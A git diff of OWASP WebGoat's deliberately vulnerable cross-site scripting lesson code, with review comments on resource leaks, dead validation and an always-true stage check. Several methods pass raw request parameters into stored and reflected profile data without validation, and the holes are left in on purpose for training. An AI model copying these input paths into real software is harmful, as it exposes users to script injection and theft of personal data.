+ CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee); + } + else + throw new UnauthenticatedException(); } - return profile; - } - - - public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public String getNextPage(WebSession s) { - String query = "SELECT * FROM employee WHERE userid = ?"; + return CrossSiteScripting.EDITPROFILE_ACTION; + } - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, subjectUserId); - ResultSet answer_results = answer_statement.executeQuery(); - if (answer_results.next()) + public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + String query = "SELECT * FROM employee WHERE userid = ?"; + + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setInt(1, subjectUserId); + ResultSet answer_results = answer_statement.executeQuery(); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; } - return profile; - } + public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = ?"; + + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setInt(1, subjectUserId); + ResultSet answer_results = answer_statement.executeQuery(); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java index 42bc14f07..c240cde80 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.CrossSiteScripting; import java.sql.PreparedStatement; @@ -7,7 +8,6 @@ import java.util.HashMap; import java.util.Map; import java.util.regex.Matcher; import java.util.regex.Pattern; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction; 
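Review bot: `getEmployeeProfile` still never closes `answer_statement` or `answer_results`, so every profile lookup leaks a JDBC statement and cursor on the session connection; the reformat keeps this, and the identical copy in `getEmployeeProfile_BACKUP` has the same leak. A `finally` block that closes both fixes it without changing the method's contract (the file appears to predate try-with-resources, given the raw `List` and `new Integer` elsewhere in the diff), and the `_BACKUP` duplicate could be dropped rather than maintained twice. Note too that `userId` is unused and `UnauthorizedException` is declared but never thrown, so the method does not relate the caller to `subjectUserId`; this may be deliberate for the lesson, but a one-line comment saying so would stop the next reader from treating it as an oversight. If `_BACKUP` stays, it should get the same close handling.
```java
            PreparedStatement answer_statement = null;
            ResultSet answer_results = null;
            try
            {
                answer_statement = WebSession.getConnection(s)
                        .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
                answer_statement.setInt(1, subjectUserId);
                answer_results = answer_statement.executeQuery();
                // … unchanged: Employee construction from answer_results (password column still not read) …
            } catch (SQLException sqle)
            {
                s.setMessage("Error getting employee profile");
                sqle.printStackTrace();
            } finally
            {
                // Release the cursor and statement even when the lookup fails.
                if (answer_results != null) try { answer_results.close(); } catch (SQLException ignored) { }
                if (answer_statement != null) try { answer_statement.close(); } catch (SQLException ignored) { }
            }
```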
@@ -18,239 +18,202 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class FindProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public FindProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - if (isAuthenticated(s)) + public FindProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + CrossSiteScripting.USER_ID); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - String searchName = null; - try - { - searchName = getRequestParameter(s, - CrossSiteScripting.SEARCHNAME); - - Employee employee = null; - - employee = findEmployeeProfile(s, userId, searchName); - if (employee == null) + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException + { + if (isAuthenticated(s)) { - setSessionAttribute(s, getLessonName() + "." 
- + CrossSiteScripting.SEARCHRESULT_ATTRIBUTE_KEY, - "Employee " + searchName + " not found."); - } - } - catch (ValidationException e) - { - if (CrossSiteScripting.STAGE6.equals(getStage(s))) - { - setStageComplete(s, CrossSiteScripting.STAGE6); - } - throw e; - } + int userId = getIntSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.USER_ID); - if (CrossSiteScripting.STAGE5.equals(getStage(s))) - { - if (searchName.indexOf("") > -1) - { - setStageComplete(s, CrossSiteScripting.STAGE5); - } - } + String searchName = null; + try + { + searchName = getRequestParameter(s, CrossSiteScripting.SEARCHNAME); - // Execute the chained Action if the employee was found. - if (foundEmployee(s)) - { + Employee employee = null; + + employee = findEmployeeProfile(s, userId, searchName); + if (employee == null) + { + setSessionAttribute(s, getLessonName() + "." + CrossSiteScripting.SEARCHRESULT_ATTRIBUTE_KEY, + "Employee " + searchName + " not found."); + } + } catch (ValidationException e) + { + if (CrossSiteScripting.STAGE6.equals(getStage(s))) + { + setStageComplete(s, CrossSiteScripting.STAGE6); + } + throw e; + } + + if (CrossSiteScripting.STAGE5.equals(getStage(s))) + { + if (searchName.indexOf("") > -1) + { + setStageComplete(s, CrossSiteScripting.STAGE5); + } + } + + // Execute the chained Action if the employee was found. 
+ if (foundEmployee(s)) + { + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + } + else + throw new UnauthenticatedException(); + } + + public String getNextPage(WebSession s) + { + String page = CrossSiteScripting.SEARCHSTAFF_ACTION; + + if (foundEmployee(s)) page = CrossSiteScripting.VIEWPROFILE_ACTION; + + return page; + } + + protected String getRequestParameter(WebSession s, String name) throws ParameterNotFoundException, + ValidationException + { + return s.getParser().getRawParameter(name); + } + + protected String getRequestParameter_BACKUP(WebSession s, String name) throws ParameterNotFoundException, + ValidationException + { + return s.getParser().getRawParameter(name); + } + + public Employee findEmployeeProfile(WebSession s, int userId, String pattern) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee try { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) + String query = "SELECT * FROM employee WHERE first_name like ? OR last_name like ?"; + + try + { + PreparedStatement answer_statement = WebSession.getConnection(s) + .prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + answer_statement.setString(1, "%" + pattern + "%"); + answer_statement.setString(2, "%" + pattern + "%"); + ResultSet answer_results = answer_statement.executeQuery(); + + // Just use the first hit. + if (answer_results.next()) + { + int id = answer_results.getInt("userid"); + // Note: Do NOT get the password field. 
+ profile = new Employee(id, answer_results.getString("first_name"), answer_results + .getString("last_name"), answer_results.getString("ssn"), + answer_results.getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */ + setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id)); + } + } catch (SQLException sqle) + { + s.setMessage("Error finding employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) { - System.out.println("Internal server error"); - ue1.printStackTrace(); + s.setMessage("Error finding employee profile"); + e.printStackTrace(); } - catch (UnauthorizedException ue2) + + return profile; + } + + private boolean foundEmployee(WebSession s) + { + boolean found = false; + try { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - } - else - throw new UnauthenticatedException(); - } - - - public String getNextPage(WebSession s) - { - String page = CrossSiteScripting.SEARCHSTAFF_ACTION; - - if (foundEmployee(s)) - page = CrossSiteScripting.VIEWPROFILE_ACTION; - - return page; - } - - - protected String getRequestParameter(WebSession s, String name) - throws ParameterNotFoundException, ValidationException - { - return s.getParser().getRawParameter(name); - } - - - protected String getRequestParameter_BACKUP(WebSession s, String name) - throws ParameterNotFoundException, ValidationException - { - return 
s.getParser().getRawParameter(name); - } - - - public Employee findEmployeeProfile(WebSession s, int userId, String pattern) - throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE first_name like ? OR last_name like ?"; - - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setString(1, "%" + pattern + "%"); - answer_statement.setString(2, "%" + pattern + "%"); - ResultSet answer_results = answer_statement.executeQuery(); - - // Just use the first hit. - if (answer_results.next()) + getIntRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID); + found = true; + } catch (ParameterNotFoundException e) { - int id = answer_results.getInt("userid"); - // Note: Do NOT get the password field. - profile = new Employee(id, answer_results - .getString("first_name"), answer_results - .getString("last_name"), answer_results - .getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results.getString("ccn"), - answer_results.getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */ - setRequestAttribute(s, getLessonName() + "." 
- + CrossSiteScripting.EMPLOYEE_ID, Integer - .toString(id)); } - } - catch (SQLException sqle) - { - s.setMessage("Error finding employee profile"); - sqle.printStackTrace(); - } + + return found; } - catch (Exception e) + + protected String validate(final String parameter, final Pattern pattern) throws ValidationException { - s.setMessage("Error finding employee profile"); - e.printStackTrace(); + Matcher matcher = pattern.matcher(parameter); + if (!matcher.matches()) throw new ValidationException(); + + return parameter; } - return profile; - } - - - private boolean foundEmployee(WebSession s) - { - boolean found = false; - try + protected static Map patterns = new HashMap(); + static { - getIntRequestAttribute(s, getLessonName() + "." - + CrossSiteScripting.EMPLOYEE_ID); - found = true; + patterns.put(CrossSiteScripting.SEARCHNAME, Pattern.compile("[a-zA-Z ]{0,20}")); } - catch (ParameterNotFoundException e) - {} - - return found; - } - - - protected String validate(final String parameter, final Pattern pattern) - throws ValidationException - { - Matcher matcher = pattern.matcher(parameter); - if (!matcher.matches()) - throw new ValidationException(); - - return parameter; - } - - protected static Map patterns = new HashMap(); - static - { - patterns.put(CrossSiteScripting.SEARCHNAME, Pattern - .compile("[a-zA-Z ]{0,20}")); - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java index 157a0e8b4..449247e36 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java 
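Review bot: The stage-5 completion test in `handleRequest`, `if (searchName.indexOf("") > -1)`, holds for every non-null string because `indexOf("")` returns 0, so as shown the stage is marked complete on any search rather than on a reflected payload; if the needle was a `<script>` literal lost in transit please confirm, otherwise it needs restoring. Independently, `getRequestParameter` and `getRequestParameter_BACKUP` are byte-identical and both return `getRawParameter` unvalidated, so the `validate`/`patterns` whitelist (`[a-zA-Z ]{0,20}`) at the end of the hunk is never applied and the `ValidationException` branch that completes stage 6 cannot be reached from this class; if `_BACKUP` is meant to hold the fixed variant it should read `return validate(s.getParser().getRawParameter(name), (Pattern) patterns.get(name));`. The `PreparedStatement` and `ResultSet` opened in `findEmployeeProfile` are also never closed, so each search leaks a cursor on the session connection; a `finally` that closes both (or try-with-resources if the project's Java level allows it) would fix that.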
@@ -1,14 +1,13 @@ + package org.owasp.webgoat.lessons.CrossSiteScripting; import java.sql.ResultSet; import java.sql.SQLException; -import java.sql.PreparedStatement; +import java.sql.PreparedStatement; import java.sql.Statement; import java.util.regex.Matcher; import java.util.regex.Pattern; - import javax.servlet.http.HttpServletRequest; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction; 
@@ -20,417 +19,370 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class UpdateProfile extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public UpdateProfile(GoatHillsFinancial lesson, String lessonName, - String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException, - ValidationException - { - if (isAuthenticated(s)) + public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + CrossSiteScripting.USER_ID); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - int subjectId = s.getParser().getIntParameter( - CrossSiteScripting.EMPLOYEE_ID, 0); - - Employee employee = null; - try - { - employee = parseEmployeeProfile(subjectId, s); - } - catch (ValidationException e) - { - if (CrossSiteScripting.STAGE2.equals(getStage(s))) + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException, ValidationException + { + if (isAuthenticated(s)) { - setStageComplete(s, CrossSiteScripting.STAGE2); + int userId = getIntSessionAttribute(s, getLessonName() + "." 
+ CrossSiteScripting.USER_ID); + + int subjectId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID, 0); + + Employee employee = null; + try + { + employee = parseEmployeeProfile(subjectId, s); + } catch (ValidationException e) + { + if (CrossSiteScripting.STAGE2.equals(getStage(s))) + { + setStageComplete(s, CrossSiteScripting.STAGE2); + } + throw e; + } + + if (subjectId > 0) + { + this.changeEmployeeProfile(s, userId, subjectId, employee); + setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer + .toString(subjectId)); + } + else + this.createEmployeeProfile(s, userId, employee); + + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } } - throw e; - } - - if (subjectId > 0) - { - this.changeEmployeeProfile(s, userId, subjectId, employee); - setRequestAttribute(s, getLessonName() + "." - + CrossSiteScripting.EMPLOYEE_ID, Integer - .toString(subjectId)); - } - else - this.createEmployeeProfile(s, userId, employee); - - try - { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) - { - System.out.println("Internal server error"); - ue1.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } + else + throw new UnauthenticatedException(); } - else - throw new UnauthenticatedException(); - } - - protected Employee parseEmployeeProfile(int subjectId, WebSession s) - throws ParameterNotFoundException, ValidationException - { - // The input validation can be added using a parsing component - // or by using an inline regular expression. The parsing component - // is the better solution. 
- - HttpServletRequest request = s.getRequest(); - String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME); - String lastName = request.getParameter(CrossSiteScripting.LAST_NAME); - String ssn = request.getParameter(CrossSiteScripting.SSN); - String title = request.getParameter(CrossSiteScripting.TITLE); - String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER); - String address1 = request.getParameter(CrossSiteScripting.ADDRESS1); - String address2 = request.getParameter(CrossSiteScripting.ADDRESS2); - int manager = Integer.parseInt(request - .getParameter(CrossSiteScripting.MANAGER)); - String startDate = request.getParameter(CrossSiteScripting.START_DATE); - int salary = Integer.parseInt(request - .getParameter(CrossSiteScripting.SALARY)); - String ccn = request.getParameter(CrossSiteScripting.CCN); - int ccnLimit = Integer.parseInt(request - .getParameter(CrossSiteScripting.CCN_LIMIT)); - String disciplinaryActionDate = request - .getParameter(CrossSiteScripting.DISCIPLINARY_DATE); - String disciplinaryActionNotes = request - .getParameter(CrossSiteScripting.DISCIPLINARY_NOTES); - String personalDescription = request - .getParameter(CrossSiteScripting.DESCRIPTION); - - Employee employee = new Employee(subjectId, firstName, lastName, ssn, - title, phone, address1, address2, manager, startDate, salary, - ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, - personalDescription); - - return employee; - } - - - protected Employee parseEmployeeProfile_BACKUP(int subjectId, WebSession s) - throws ParameterNotFoundException, ValidationException - { - // The input validation can be added using a parsing component - // or by using an inline regular expression. The parsing component - // is the better solution. 
- - HttpServletRequest request = s.getRequest(); - String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME); - String lastName = request.getParameter(CrossSiteScripting.LAST_NAME); - String ssn = request.getParameter(CrossSiteScripting.SSN); - String title = request.getParameter(CrossSiteScripting.TITLE); - String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER); - String address1 = request.getParameter(CrossSiteScripting.ADDRESS1); - String address2 = request.getParameter(CrossSiteScripting.ADDRESS2); - int manager = Integer.parseInt(request - .getParameter(CrossSiteScripting.MANAGER)); - String startDate = request.getParameter(CrossSiteScripting.START_DATE); - int salary = Integer.parseInt(request - .getParameter(CrossSiteScripting.SALARY)); - String ccn = request.getParameter(CrossSiteScripting.CCN); - int ccnLimit = Integer.parseInt(request - .getParameter(CrossSiteScripting.CCN_LIMIT)); - String disciplinaryActionDate = request - .getParameter(CrossSiteScripting.DISCIPLINARY_DATE); - String disciplinaryActionNotes = request - .getParameter(CrossSiteScripting.DISCIPLINARY_NOTES); - String personalDescription = request - .getParameter(CrossSiteScripting.DESCRIPTION); - - Employee employee = new Employee(subjectId, firstName, lastName, ssn, - title, phone, address1, address2, manager, startDate, salary, - ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, - personalDescription); - - return employee; - } - - - protected Employee doParseEmployeeProfile(int subjectId, - ParameterParser parser) throws ParameterNotFoundException, - ValidationException - { - // Fix this method using the org.owasp.webgoat.session.ParameterParser class - return null; - } - - - public String getNextPage(WebSession s) - { - return CrossSiteScripting.VIEWPROFILE_ACTION; - } - - - public void changeEmployeeProfile(WebSession s, int userId, int subjectId, - Employee employee) throws UnauthorizedException - { - try + protected Employee 
parseEmployeeProfile(int subjectId, WebSession s) throws ParameterNotFoundException, + ValidationException { - // Note: The password field is ONLY set by ChangePassword - String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," - + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," - + " personal_description = ? WHERE userid = ?;"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - - ps.setString(1, employee.getFirstName()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getPersonalDescription()); - ps.setInt(13, subjectId); - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } + // The input validation can be added using a parsing component + // or by using an inline regular expression. The parsing component + // is the better solution. 
+ HttpServletRequest request = s.getRequest(); + String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME); + String lastName = request.getParameter(CrossSiteScripting.LAST_NAME); + String ssn = request.getParameter(CrossSiteScripting.SSN); + String title = request.getParameter(CrossSiteScripting.TITLE); + String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER); + String address1 = request.getParameter(CrossSiteScripting.ADDRESS1); + String address2 = request.getParameter(CrossSiteScripting.ADDRESS2); + int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER)); + String startDate = request.getParameter(CrossSiteScripting.START_DATE); + int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY)); + String ccn = request.getParameter(CrossSiteScripting.CCN); + int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT)); + String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE); + String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES); + String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION); + + Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, + manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, + personalDescription); + + return employee; } - catch (Exception e) + + protected Employee parseEmployeeProfile_BACKUP(int subjectId, WebSession s) throws ParameterNotFoundException, + ValidationException { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); + // The input validation can be added using a parsing component + // or by using an inline regular expression. The parsing component + // is the better solution. 
+ + HttpServletRequest request = s.getRequest(); + String firstName = request.getParameter(CrossSiteScripting.FIRST_NAME); + String lastName = request.getParameter(CrossSiteScripting.LAST_NAME); + String ssn = request.getParameter(CrossSiteScripting.SSN); + String title = request.getParameter(CrossSiteScripting.TITLE); + String phone = request.getParameter(CrossSiteScripting.PHONE_NUMBER); + String address1 = request.getParameter(CrossSiteScripting.ADDRESS1); + String address2 = request.getParameter(CrossSiteScripting.ADDRESS2); + int manager = Integer.parseInt(request.getParameter(CrossSiteScripting.MANAGER)); + String startDate = request.getParameter(CrossSiteScripting.START_DATE); + int salary = Integer.parseInt(request.getParameter(CrossSiteScripting.SALARY)); + String ccn = request.getParameter(CrossSiteScripting.CCN); + int ccnLimit = Integer.parseInt(request.getParameter(CrossSiteScripting.CCN_LIMIT)); + String disciplinaryActionDate = request.getParameter(CrossSiteScripting.DISCIPLINARY_DATE); + String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES); + String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION); + + Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, + manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, + personalDescription); + + return employee; } - } - - public void doChangeEmployeeProfile_BACKUP(WebSession s, int userId, - int subjectId, Employee employee) throws UnauthorizedException - { - try + protected Employee doParseEmployeeProfile(int subjectId, ParameterParser parser) throws ParameterNotFoundException, + ValidationException { - // Note: The password field is ONLY set by ChangePassword - String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," - + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," - + " 
